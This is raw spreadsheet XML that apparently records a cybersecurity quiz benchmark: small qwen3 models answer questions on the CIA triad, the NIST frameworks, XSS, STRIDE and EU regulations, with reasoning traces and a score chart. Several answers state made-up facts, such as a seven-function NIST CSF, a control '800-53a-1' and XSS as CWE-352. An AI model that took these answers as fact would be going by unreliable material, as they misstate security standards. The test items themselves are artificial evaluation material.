The principle of the CIA triad upheld by data checksums (like SHA-256) is **Integrity**. This ensures that files are not altered or corrupted, as the checksum verifies the authenticity and correctness of the data.</t>
  </si>
  <si>
    <t>qwen3:1.7b</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user wants to know the type of statement "The system must enforce multi-factor authentication (MFA) for all administrative access" and its primary purpose in cybersecurity.
First, I need to identify the type of statement. The phrase "must enforce" suggests a mandatory requirement. In cybersecurity, such statements are often categorized as policy or compliance statements. They outline the necessary security measures that must be implemented.
Next, the primary purpose. The main goal here is to strengthen security by requiring MFA, which adds an extra layer of protection. This helps prevent unauthorized access, especially for administrative accounts which have high privileges. The purpose is to mitigate risks like brute force attacks or unauthorized access attempts.
I should also consider if there's any other classification. Maybe it's a security requirement or a risk management statement. But the key here is the mandatory enforcement, so policy or compliance makes sense. The primary purpose is to enforce a specific security measure to protect against threats.
I need to make sure I'm not mixing up different types. For example, a risk assessment statement would be about identifying risks, but this is about what must be done. So yes, policy or compliance. Primary purpose is to implement MFA as a defense in depth.
&lt;/think&gt;
The statement is a **policy or compliance statement** in the context of cybersecurity. Its primary purpose is to **enforce a specific security requirement** (MFA for administrative access) to **reduce risks** such as unauthorized access, privilege abuse, or brute-force attacks. It ensures organizational adherence to security standards (e.g., NIST, ISO 27001) and safeguards critical systems and data.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so the user is asking about the NIST Cybersecurity Framework and which two core functions were demonstrated when a company dealt with a ransomware attack by restoring from backups. Let me think.
First, I remember the NIST CSF has seven core functions: Identify, Protect, Detect, Respond, Recover, Maintain, and Engage. The question mentions the incident response plan, so the Respond and Recover functions are likely involved. 
When they activate the incident response plan, they're trying to contain the damage and restore systems. The Respond function includes taking actions to mitigate the threat and contain the impact. The Recover function is about restoring systems and data after the threat has been contained. 
But wait, the question says "most prominently demonstrated" by these actions. So the actions here are containing the damage and restoring from backups. That would align with the Respond and Recover functions. 
I should check if there's any other functions involved. For example, the Detect function is about identifying the incident, but in this case, the company already activated the plan, so maybe Detect isn't the main one here. The Identify function is about understanding the threat, but again, the company's actions are more about response and recovery. 
So the answer should be Respond and Recover. Let me confirm: when you respond to an incident, you take steps to contain it, and when you recover, you restore systems. So yes, those two functions are most prominent here.
&lt;/think&gt;
The actions of activating the incident response plan and restoring systems from backups primarily demonstrate the **"Respond"** and **"Recover"** core functions of the NIST Cybersecurity Framework.  
- **Respond**: Containing the damage and mitigating the impact.  
- **Recover**: Restoring systems and data after the threat is neutralized.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about the NIST SP 800-53 standard and which control family addresses the requirement for recording all privileged user actions in immutable, time-stamped logs. Let me recall the NIST SP 800-53 controls.
First, I remember that SP 800-53 has several control families, like Access Control, Cryptographic Measures, Identity and Access Management, etc. The question is about logging and recording actions, so maybe it's under Access Control or Identity and Access Management.
Wait, the specific control related to logging and auditing. I think there's a control called "Access Control" which includes requirements for logging and auditing. But the exact number might be different. Let me think. The control number might be 800-53a-1, but I need to be precise. 
Alternatively, the "System and Information System Engineering" (SISE) control family might have something related. But the user mentioned "immutable, time-stamped log files," which sounds more like a specific requirement. 
Wait, the NIST SP 800-53 Rev 2 has a control called "Control 800-53a-1: Access Control" which includes requirements for logging and auditing. But I need to check the exact control. 
Alternatively, the "System and Information System Engineering" (SISE) control family might have a control that addresses this. Wait, the SISE control family includes controls related to system management, security, and resilience. However, the specific control for logging might be under Access Control. 
Wait, the exact answer might be Control 800-53a-1, which is about access control, and it includes the requirement for logging and auditing. But I need to confirm. 
Alternatively, maybe it's under the "Identity and Access Management" (IAM) control family. But I think the main one here is Access Control. 
Another angle: the requirement is that all actions by privileged users must be recorded in immutable logs. This is similar to the "Audit and Accountability" requirement in the Access Control control family. 
Wait, the NIST SP 800-53 has a control called "Control 800-53a-1: Access Control," which includes requirements for logging and auditing. The exact wording might be that the system must record all actions performed by users, including logins and system changes, in an immutable and time-stamped log file. 
So the answer would be the Access Control control family, specifically Control 800-53a-1. But I need to make sure. Let me check the exact control numbers. 
In SP 800-53 Rev 2, the Access Control control family includes Control 800-53a-1, which requires that system logs be recorded for all actions, including logins and system changes, in an immutable and time-stamped format. That matches the user's question. 
Therefore, the answer is the Access Control control family, specifically Control 800-53a-1.
&lt;/think&gt;
The requirement for recording all privileged user actions in immutable, time-stamped log files is addressed by **NIST SP 800-53 Rev 2, Control Family 800-53a-1: Access Control**. This control mandates that systems record all user actions (including logins and system changes) in an immutable, time-stamped log file to ensure auditability and accountability.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user is asking about a vulnerability in a web application where user input is directly rendered without sanitization. The example given is an attacker using a script tag to redirect to an attacker's site and steal cookies.
First, I need to recall the common name for this vulnerability. From what I remember, this is called a Cross-Site Scripting (XSS) attack. But wait, the exact term might be more specific. Oh right, the common name is Cross-Site Scripting, which is often referred to as XSS.
Then, the CWE identifier. I think the CWE for this specific type of XSS is 303. Let me confirm. Yes, CWE 303 is for Injection, but wait, no. Wait, XSS is typically categorized under CWE 352. Wait, I need to be careful here. Let me think. The Common Weakness Enumeration (CWE) for XSS is 352. But sometimes, the classification might vary. Wait, no, actually, the CWE for XSS is 352. But the user might be looking for the specific CWE that corresponds to the injection type. Wait, the question says "corresponding CWE identifier." So, the vulnerability here is a type of injection, but the specific CWE for XSS is 352. However, the user might be referring to the CWE for the specific attack vector. Wait, no, the CWE is for the vulnerability, not the attack. So, the vulnerability is XSS, which is CWE 352. But I need to make sure. Alternatively, maybe the CWE is 303 for injection. Wait, I'm getting confused. Let me check my memory. 
In the CWE list, the injection vulnerabilities are categorized under CWE 303. But XSS is a specific type of injection. So, the CWE for XSS is 352. Wait, no, I think the correct CWE for XSS is 352. But I need to confirm. Alternatively, maybe the answer is that the vulnerability is XSS, and the CWE is 352. But the user might be looking for the specific CWE for the injection type. So, the answer would be that the common name is Cross-Site Scripting (XSS), and the CWE is 352. However, sometimes the CWE is 303 for injection. Wait, no, the CWE 303 is for injection, but the specific type of injection is different. So, in this case, the vulnerability is XSS, which is a type of injection, so the CWE is 352. But I need to be precise here. 
Alternatively, maybe the answer is that the common name is Cross-Site Scripting (XSS), and the CWE is 352. So, the user is looking for that. Therefore, the answer should state that the vulnerability is XSS, and the CWE is 352.
&lt;/think&gt;
The common name for this vulnerability is **Cross-Site Scripting (XSS)**. Its corresponding CWE identifier is **352**. 
This vulnerability occurs when user input is directly rendered without proper sanitization, allowing attackers to inject malicious scripts (e.g., the example uses `&lt;script&gt;` to steal cookies).</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user is asking about a threat in the STRIDE model. The scenario is that an unauthorized user can intercept and alter data packets between a client and server, changing the amount of a financial transaction.
First, I need to recall what STRIDE stands for. STRIDE is one of the seven categories in the Threat Modeling framework. The categories are: Threat, Impact, Risk, Enumeration, Exploit, and Definitions. Wait, no, actually STRIDE is spelled S-T-R-I-D-E. The categories are: Spoofing, Tampering, Replay, Information Disclosure, Denial of Service, and Elevation of Privilege. Wait, maybe I'm mixing up the categories. Let me think again.
Wait, the original STRIDE model has six categories: Spoofing, Tampering, Replay, Information Disclosure, Denial of Service, and Elevation of Privilege. But the user mentioned the threat of intercepting and altering data packets. That's more about Tampering, right? Because Tampering involves altering data. But wait, the question says "intercept and alter data packets," which is a form of Tampering. But the answer options might be different. Wait, the user is asking which category this threat belongs to in STRIDE. So the answer would be Tampering. But let me make sure.
Alternatively, maybe it's considered as a type of Replay, but Replay is about reusing past transmissions. Interception is different. So the correct category here is Tampering. So the answer is Tampering.
&lt;/think&gt;
This threat belongs to the **Tampering** category in the STRIDE model. Tampering involves altering or intercepting data to change the transaction amount, which directly impacts the integrity of the financial transaction.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about two different security incidents in the EU and which regulations apply to each. 
First, the incident 1 is a cyberattack on a power grid operator disrupting electricity. I remember that in the EU, there's the Network and Information Security (NIS) Directive. That's about securing critical infrastructure. So the power grid is a critical infrastructure sector, so the NIS Directive would apply here. The NIS Directive requires operators of critical infrastructure to have adequate security measures and report incidents.
Then, the second incident is a data breach at a social media company exposing users' messages. The GDPR comes to mind. GDPR is about data protection and privacy. Since the breach involves personal data, GDPR would be the primary regulation here. The company must comply with GDPR, including reporting breaches to the supervisory authority within 72 hours.
Wait, but the user asked which regulation is primary for each. So for the power grid attack, NIS Directive is primary. For the social media breach, GDPR is primary. I should make sure to mention both regulations and their respective contexts. Also, note that the NIS Directive is more about the security of critical infrastructure, while GDPR is about data protection. The power grid is a critical infrastructure, so NIS applies. The social media company's data breach is under GDPR. That makes sense.
&lt;/think&gt;
**Incident 1 (Power Grid Cyberattack):**  
The **Network and Information Security (NIS) Directive** (EU Regulation No 1463/2013) is the primary concern. This directive mandates security measures for critical infrastructure operators (like power grids) and requires reporting of incidents to national authorities.  
**Incident 2 (Social Media Data Breach):**  
The **General Data Protection Regulation (GDPR)** (EU Regulation No 2016/679) is the primary concern. GDPR applies to data breaches involving personal data (e.g., users' messages), requiring organizations to report breaches to their supervisory authority within 72 hours and comply with data protection obligations.  
**Key Difference:**  
- **NIS Directive** focuses on securing critical infrastructure (e.g., power grids).  
- **GDPR** governs data protection and privacy (e.g., social media users' messages).</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about the CIA triad principles and how a cloud storage service using SHA-256 hashes upholds one of them.
First, I need to recall the CIA triad: Confidentiality, Integrity, and Availability. The question is about which principle is being upheld here. The cloud service uses checksums like SHA-256 to verify that files haven't been altered. 
So, integrity is about ensuring data accuracy and completeness. If the checksums are correct, it means the data hasn't been changed. That's about keeping the data intact. Confidentiality would be about keeping data secret, but the question mentions the checksums being used to detect alterations, not necessarily about secrecy. Availability is about ensuring data is accessible when needed, but the focus here is on preventing corruption, not availability.
Therefore, the principle being upheld here is Integrity. The checksums ensure that the data remains unchanged, so the service is maintaining the integrity of the files. The answer should be Integrity.
&lt;/think&gt;
The principle being upheld is **Integrity**. The use of SHA-256 hashes ensures that files remain unaltered and accurate, preserving their integrity during uploads and downloads.</t>
  </si>
  <si>
    <t>qwen3:4b</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so the user is asking me to analyze the statement "The system must enforce multi-factor authentication (MFA) for all administrative access." They want to know what type of statement this is in cybersecurity and its primary purpose.
First, I need to recall the different types of cybersecurity statements. There's requirements, policies, procedures, controls, etc. This statement is about a specific security measure. It's a requirement because it's stating that MFA must be enforced. 
Now, the primary purpose. MFA is a control measure to prevent unauthorized access. By requiring MFA for administrative access, the system is trying to strengthen authentication, reduce the risk of account takeover, and ensure that only authorized users can access sensitive systems. 
I should also consider if this is a policy or a procedure. But since it's a statement that dictates what must be done, it's more of a requirement or a security control. In cybersecurity, requirements are often part of a policy or a standard. So maybe it's a security requirement or a control. 
Wait, the question says "type of statement." In cybersecurity, such statements are typically part of a security policy or a control requirement. The primary purpose is to enhance the security of administrative access by adding an extra layer of authentication, thereby mitigating the risk of unauthorized access. 
I need to make sure I'm not confusing terms. A requirement is a statement that something must be done. So this is a requirement. The purpose is to enforce MFA as a control to protect administrative access. 
Yes, that's right. So the answer is that it's a security requirement or a control, and its purpose is to ensure that administrative access is protected with MFA, reducing the risk of unauthorized access.
&lt;/think&gt;
This is a **security requirement** in cybersecurity. Its primary purpose is to **enforce multi-factor authentication (MFA)** for administrative access, thereby strengthening authentication mechanisms and reducing the risk of unauthorized access to critical systems.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about the NIST Cybersecurity Framework and which two core functions are demonstrated when a company activates their incident response plan and restores systems from backups after a ransomware attack.
First, I need to recall the NIST CSF's core functions. The framework has five core functions: Identify, Protect, Detect, Respond, and Recover. 
The question mentions activating the incident response plan and restoring from backups. These actions are part of the Respond and Recover functions. 
Wait, Respond is about taking action to contain the incident, while Recover is about restoring systems and resuming operations. But the question says the company is restoring systems from backups. That's more about recovery. However, activating the incident response plan is part of the Respond function. 
So the two functions here would be Respond and Recover. Let me check that again. Yes, Respond includes containing the incident, and Recover involves restoring systems. So the answer should be Respond and Recover.
&lt;/think&gt;
The two core functions demonstrated are **Respond** and **Recover**.  
- **Respond**: Activating the incident response plan to contain the ransomware attack.  
- **Recover**: Restoring systems from backups to resume operations.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about a security policy that requires all actions by privileged users to be recorded in immutable, time-stamped log files. They want to know which NIST SP 800-53 control family this falls under.
First, I need to recall the NIST SP 800-53 structure. The standard is divided into several control families, each with specific categories. The main ones are AC (Access Control), AU (Auditing), CA (Configuration Assurance), and others.
The policy in question is about logging and immutability. Auditing controls are about monitoring and recording system activities. So, the AU family would be relevant here. Specifically, AU-1, which deals with audit trails, requires that system activities be recorded. Additionally, the immutability of logs is covered under AU-2, which ensures that audit records are not altered. 
But wait, the question is about the control family, not the specific controls. So the answer is the Auditing (AU) family. The user might be looking for AU as the family. I should confirm that AU is the correct family. Yes, AU-1 and AU-2 are part of the Auditing family. Therefore, the answer is the Auditing (AU) control family.
&lt;/think&gt;
The control family in NIST SP 800-53 that addresses this requirement is **Auditing (AU)**. Specifically, **AU-1** (Audit Trail) and **AU-2** (Audit Record Integrity) ensure that privileged user actions are logged, time-stamped, and immutable.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about a vulnerability where a web app directly renders user input without sanitizing it. The example given is a script tag that steals cookies. Let me recall the common names for such issues.
First, the main term here is that the application is rendering untrusted user input as part of the page, which can lead to executing malicious scripts. The common name for this is Cross-Site Scripting (XSS). But wait, there's also a specific type called Reflected XSS, which happens when the input is immediately reflected back to the user. Since the comment is rendered directly without any processing, that fits Reflected XSS.
Now, the CWE identifier. I remember that CWE-79 is for Cross-Site Scripting. Let me confirm. Yes, CWE-79 is the Common Weakness Enumeration for Cross-Site Scripting. So the answer would be that the vulnerability is Cross-Site Scripting (XSS), and the corresponding CWE identifier is CWE-79.
&lt;/think&gt;
The vulnerability is **Cross-Site Scripting (XSS)**, specifically **Reflected XSS**, and its corresponding CWE identifier is **CWE-79**.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about a threat in the STRIDE model. Let me recall what STRIDE stands for. STRIDE is a framework for identifying threats in security scenarios. The categories are: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege.
The question mentions that an unauthorized user can intercept and alter data packets, changing the amount of a financial transaction. So, the key here is that the data is being modified in transit. Tampering is about altering data, which fits here. Spoofing is more about impersonating someone, like fake addresses. So the answer should be Tampering. Let me make sure. Yes, Tampering in STRIDE refers to modifying data, which is exactly what's happening here. The user is changing the transaction amount, so that's a tampering attack. I should confirm that there's no other category that fits better. Denial of Service is about making the system unavailable, which isn't the case here. Elevation of Privilege is about gaining higher access, which isn't involved. So definitely Tampering.
&lt;/think&gt;
The threat described belongs to the **Tampering** category in the STRIDE threat model. This category addresses the unauthorized modification of data during transmission, which directly aligns with the scenario of altering financial transaction amounts via intercepted packets.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about two security incidents in the EU and which regulation applies to each. Let me break this down.
First, the power grid operator's cyberattack disrupting electricity distribution. The EU has regulations related to critical infrastructure. The main one is the NIS Directive (Network and Information Security Directive), which requires operators of essential services to implement security measures. Since the power grid is part of the essential services, the NIS Directive would be the primary concern here. Also, there's the NIS2 regulation, which is an updated version, but I think the NIS Directive is more relevant for this scenario.
Next, the social media company's data breach exposing personal messages. That's a data protection issue. The GDPR (General Data Protection Regulation) is the key here. GDPR applies to any processing of personal data, including data breaches. The company would need to report the breach under GDPR, especially since it involves millions of users. The NIS Directive might also apply if the breach affects the security of the network, but the primary concern is definitely GDPR.
Wait, but the NIS2 is more recent. The user might be referring to the NIS2 as the primary regulation. However, the original NIS Directive is still in place. But in the EU, NIS2 is the newer version, so maybe the answer should mention NIS2 for the first incident. However, the question is about the primary concern. Both NIS and NIS2 are about critical infrastructure. But the NIS2 is more comprehensive. However, the user might not be aware of the difference. Let me check: NIS2 is an updated version that applies to the same sectors, including energy. So the answer should be NIS2 for the first incident and GDPR for the second. But maybe the user is expecting the NIS Directive. Hmm. The question says "primary concern for incident 1," so NIS2 is the correct answer. For the second, GDPR is definitely correct.
So the answer is: Incident 1 under NIS2, incident 2 under GDPR.
&lt;/think&gt;
- **Incident 1 (Power grid disruption):** Primary concern is the **NIS2 (Network and Information Security 2) Regulation**, which governs critical infrastructure (including energy) to ensure security and resilience.  
- **Incident 2 (Data breach):** Primary concern is the **GDPR (General Data Protection Regulation)**, as it addresses the protection of personal data and requires notification of data breaches involving millions of users.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so the user is asking which principle of the CIA triad is being upheld by using data checksums like SHA-256 in a cloud storage service. Let me start by recalling what the CIA triad is. It stands for Confidentiality, Integrity, and Availability. 
The question is about data checksums. Checksums are used to verify data integrity, right? They ensure that the data hasn't been altered or corrupted during transmission. So, if a file is uploaded or downloaded, the checksum allows the system to check if the data is the same as the original. If there's any change, the checksum will differ, indicating possible corruption or tampering.
Now, which part of the triad does that relate to? Confidentiality is about keeping data secret, which isn't directly related here. Availability is about ensuring the data is accessible when needed, which also doesn't fit. Integrity is about ensuring data is accurate and reliable, which matches the purpose of checksums. 
Wait, but I should make sure I'm not mixing up anything. Sometimes people confuse integrity with authenticity. But in this context, the checksum is about ensuring that the data hasn't been altered, so it's definitely integrity. The SHA-256 hash is a cryptographic checksum, which helps in verifying the data's integrity. So the answer should be Integrity.
&lt;/think&gt;
The principle of the CIA triad being upheld by data checksums (like SHA-256) is **Integrity**. Checksums ensure data remains unaltered or corrupted during transmission, verifying the accuracy and reliability of the stored or transferred information.</t>
  </si>
  <si>
    <t>qwen3:8b</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about the statement: "The system must enforce multi-factor authentication (MFA) for all administrative access." They want to know what type of statement this is and its primary purpose in cybersecurity.
First, I need to recall the different types of cybersecurity statements. There's policy, procedure, standard, guideline, etc. The statement is a directive, so it's likely a policy. Policies are high-level statements that set the rules. 
The primary purpose here is to enhance security. MFA is a control to prevent unauthorized access. By enforcing MFA for admin access, the system reduces the risk of breaches. The main goal is to ensure that only authorized users can access administrative functions, which are critical and often targeted by attackers.
Wait, is there a chance it's a procedure? No, procedures are more about the steps to follow. This is a rule that must be followed, so policy fits better. The purpose is to mandate the use of MFA as a security measure, which is a common practice in cybersecurity to mitigate risks. 
I should also consider if there's another term. Maybe a control? But the statement is more about a requirement rather than a specific control. Policies are the overarching rules. So the answer should state it's a cybersecurity policy, and the purpose is to enforce MFA to protect administrative access from unauthorized access.
&lt;/think&gt;
This statement is a **cybersecurity policy**. Its primary purpose is to **mandate the use of multi-factor authentication (MFA)** for administrative access, thereby **reducing the risk of unauthorized access** and enhancing the security of critical systems. It establishes a mandatory control to protect sensitive resources from credential theft and account compromise.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user is asking about the NIST Cybersecurity Framework and which two core functions are demonstrated when a company responds to a ransomware attack by activating their incident response plan and restoring from backups.
First, I need to recall the NIST CSF's core functions. The framework has five core functions: Identify, Protect, Detect, Respond, and Recover. 
The scenario mentions containing the damage and restoring systems. Containing damage sounds like part of the Respond function because that's where you take actions to limit the impact of a security incident. Restoring systems from backups would fall under the Recover function, which focuses on restoring operations and systems after an incident.
Wait, but maybe Detect is involved too? Detect is about identifying the incident. However, the question specifies actions taken after the incident is already active—activating the response plan and restoring. So Detect might not be the main ones here. 
So the two functions are Respond and Recover. Let me double-check. The Respond function includes containing the incident, and Recover involves restoring systems. Yes, that makes sense. The answer should be Respond and Recover.
&lt;/think&gt;
The two core functions most prominently demonstrated are **Respond** and **Recover**.  
- **Respond** involves containing the ransomware attack to limit damage.  
- **Recover** focuses on restoring systems and operations from backups to resume normal functioning.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about a security policy requirement that all actions by privileged users must be recorded in immutable, time-stamped logs. They want to know which control family in NIST SP 800-53 addresses this.
First, I need to recall the NIST SP 800-53 control families. The main ones are Access Control, Audit and Accountability, Configuration Management, etc. The key here is the requirement for logging and immutability. 
The Audit and Accountability family deals with logging and monitoring system activities. Controls like AU-2, AU-6, and AU-12 are relevant here. AU-2 requires that all privileged activities be logged, and AU-6 mentions time-stamping. Immutability would fall under ensuring logs can't be altered, which might also tie into Configuration Management (CM-6) about protecting audit logs. But the primary focus here is on logging and accountability, so Audit and Accountability is the main control family. 
I should confirm if there's another family that might cover this. Configuration Management deals with system configurations, but the logging itself is more about accountability. So the answer is Audit and Accountability.
&lt;/think&gt;
The requirement is addressed by the **Audit and Accountability (AU)** control family in NIST SP 800-53. Specifically, controls like **AU-2** (logging of privileged actions) and **AU-6** (time-stamping of logs) ensure immutability and accountability for system activities.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user is asking about a web application vulnerability where user input is directly rendered without sanitization. The example given is a script that steals cookies. Hmm, I remember that when user input is not properly sanitized and is executed as code, that's a common issue.
Wait, the scenario mentions the comments section. So if the attacker injects a script tag, that's probably a cross-site scripting (XSS) attack. XSS is when an attacker injects malicious scripts into web pages viewed by other users. The example script is trying to steal cookies by redirecting the user's browser to an attacker's site with their cookies. That's a classic XSS payload.
Now, the CWE identifier. I think the Common Weakness Enumeration for XSS is CWE-79. Let me confirm. Yes, CWE-79 is Cross-Site Scripting. So the answer should be Cross-Site Scripting (XSS) and CWE-79. I need to make sure there's no other possible CWE here. Sometimes there are other related ones, but XSS is the main one here. The key point is that the input is not sanitized, leading to script execution. Yep, that's definitely XSS and CWE-79.
&lt;/think&gt;
The common name for this vulnerability is **Cross-Site Scripting (XSS)**, and its corresponding CWE identifier is **CWE-79**.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let me try to figure this out. The user is asking about a threat modeling exercise using the STRIDE model. The specific threat is about an unauthorized user intercepting and altering data packets between a client and server, changing a financial transaction amount.
First, I need to recall what STRIDE stands for. STRIDE is a Microsoft security threat modeling framework that categorizes threats into six categories: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. 
The scenario here involves an unauthorized user intercepting and altering data. So, altering data packets would fall under tampering. Let me check each category:
- Spoofing is about impersonating someone, like forging identities.
- Tampering is modifying data or resources without authorization.
- Repudiation is about denying actions, like not being able to prove a transaction happened.
- Information Disclosure is leaking sensitive info.
- Denial of Service is making a service unavailable.
- Elevation of Privilege is gaining higher access than allowed.
Since the threat is about altering the data (changing transaction amounts), that's tampering. So the answer should be Tampering. I should make sure there's no other category that fits better. Repudiation might be related if the altered data could be used to deny actions, but the primary issue here is the modification of data, which is tampering. Yeah, I think that's correct.
&lt;/think&gt;
This threat falls under the **Tampering** category in the STRIDE model, as it involves unauthorized modification of data packets during transmission.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about two security incidents in the EU and which regulations apply to each. 
First, I need to recall the main cybersecurity regulations in the EU. The two primary ones are the General Data Protection Regulation (GDPR) and the Network and Information Systems Security Directive (NIS Directive). 
For the first incident, a power grid operator experiencing a cyberattack that disrupts electricity distribution. The NIS Directive is specifically about protecting critical infrastructure. It requires operators of essential services, like energy, to ensure the security of their networks and systems. So this incident would fall under the NIS Directive.
The second incident is a social media company's data breach exposing personal messages. GDPR deals with the protection of personal data. Since the breach involves personal data of millions of users, GDPR would be the primary concern here. GDPR mandates notification of data breaches and has strict requirements for handling such incidents.
I should make sure there's no overlap or confusion. NIS is for critical infrastructure and network security, while GDPR is about data protection and privacy. The social media company is a data controller, so GDPR applies. The power grid is part of essential services under NIS. 
No other regulations come to mind here. The user might be testing knowledge of EU cybersecurity frameworks, so confirming the correct regulations for each scenario is key.
&lt;/think&gt;
**Incident 1 (Power grid cyberattack):** Primary concern is the **NIS Directive** (Network and Information Systems Security Directive), which governs critical infrastructure and cybersecurity for essential services.  
**Incident 2 (Data breach of social media):** Primary concern is the **GDPR** (General Data Protection Regulation), which addresses the protection of personal data and breach notification requirements.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user is asking about the CIA triad and which principle is being upheld by using data checksums like SHA-256 in a cloud storage service. The CIA triad stands for Confidentiality, Integrity, and Availability. 
So, the question is about data checksums. I remember that checksums are used to verify data integrity. They ensure that the data hasn't been altered during transmission. For example, if a file is uploaded or downloaded, the checksum is calculated before and after the transfer. If they match, the data is intact. 
Confidentiality is about keeping data private, which is more about encryption and access controls. Availability is about ensuring the data is accessible when needed, which relates to uptime and redundancy. Integrity, on the other hand, is about ensuring the data is accurate and hasn't been tampered with. 
Since the question mentions verifying that files haven't been altered or corrupted, that directly relates to integrity. The use of SHA-256 hashes is a method to ensure data integrity. So the answer should be Integrity. I need to make sure there's no confusion with other principles. Let me double-check. Yes, checksums are definitely for integrity checks. So the correct principle here is Integrity.
&lt;/think&gt;
The principle of the CIA triad primarily upheld by data checksums (like SHA-256) is **Integrity**. This ensures data remains unaltered and accurate during transmission or storage.</t>
  </si>
  <si>
    <t>Score</t>
  </si>
  <si>
    <t>Correct %</t>
  </si>
  <si>
    <t>Incomplete</t>
  </si>
  <si>
    <t>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</si>
</sst>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rgb="FFFFFFFF"/>
      <name val="Calibri"/>
    </font>
  </fonts>
  <fills count="3">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF4F81BD"/>
        <bgColor rgb="FF4F81BD"/>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164" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="48">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pt-PT"/>
              <a:t>Total Score by Model</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="1"/>
    </c:title>
    <c:autoTitleDeleted val="0"/>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:invertIfNegative val="1"/>
          <c:cat>
            <c:strRef>
              <c:f>Summary!$A$2:$A$26</c:f>
              <c:strCache>
                <c:ptCount val="25"/>
                <c:pt idx="0">
                  <c:v>deepseek-r1:1.5b</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>deepseek-r1:7b</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>gemma3:1b</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>gemma3:4b</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>gemma3n:e2b</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>granite3-dense:2b</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>granite3-dense:8b</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>granite3.2:2b</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>granite3.2:8b</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>lily_cyber:latest</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>llama3.2:1b</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>llama3.2:3b</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>llama3:8b</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>mistral:7b</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>phi3:3.8b</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>phi4-mini-reasoning:3.8b</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>phi4-mini:3.8b</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>qwen2.5:0.5b</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>qwen2.5:1.5b</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>qwen2.5:3b</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>qwen2.5:7b</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>qwen3:0.6b</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>qwen3:1.7b</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>qwen3:4b</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>qwen3:8b</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Summary!$I$2:$I$26</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="25"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>14</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="12">
